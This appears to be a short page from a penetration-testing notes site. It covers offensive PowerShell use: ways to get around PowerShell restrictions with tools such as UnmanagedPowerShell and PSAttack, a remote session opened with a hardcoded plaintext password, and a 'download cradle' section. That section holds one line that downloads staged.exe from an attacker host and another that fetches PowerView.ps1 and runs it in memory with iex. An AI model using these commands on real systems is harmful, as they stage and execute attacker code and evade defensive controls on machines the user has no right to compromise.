Powershell

Bypasses for using powershell

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe # 32 Bit
    
Custom EXEs using the System.Management.Automation.dll
UnmanagedPowerShell
NotPowerShell
PSAttack  ## Can bundle in your own modules very useful.

Enter-PSSession

Can have mixed results documentation can be found here.

$password = ConvertTo-SecureString "PasswordPassword123!!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("remoteadmin", $password)
Enter-PSSession -ComputerName Remote01 -Credential $cred
[Remote01]: PS C:\Users\remoteadmin\Documents> whoami
whoami
Remote01\remoteadmin

Useful one liners

Retrieve Local Administrators

"Win32_userAccount.Domain='$env:computername',Name='Administrator'" ## Retreieve local admins

Download Cradle

(New-Object System.Net.WebClient).DownloadFile('http://192.168.49.143:8000/staged.exe', 'staged.exe')
iex (New-Object Net.WebClient).DownloadString('http://192.168.99.2:81/Tools/PowerView.ps1')

PreviousScheduled Tasks NextWindows Privesc

Last updated 2 years ago

Was this helpful?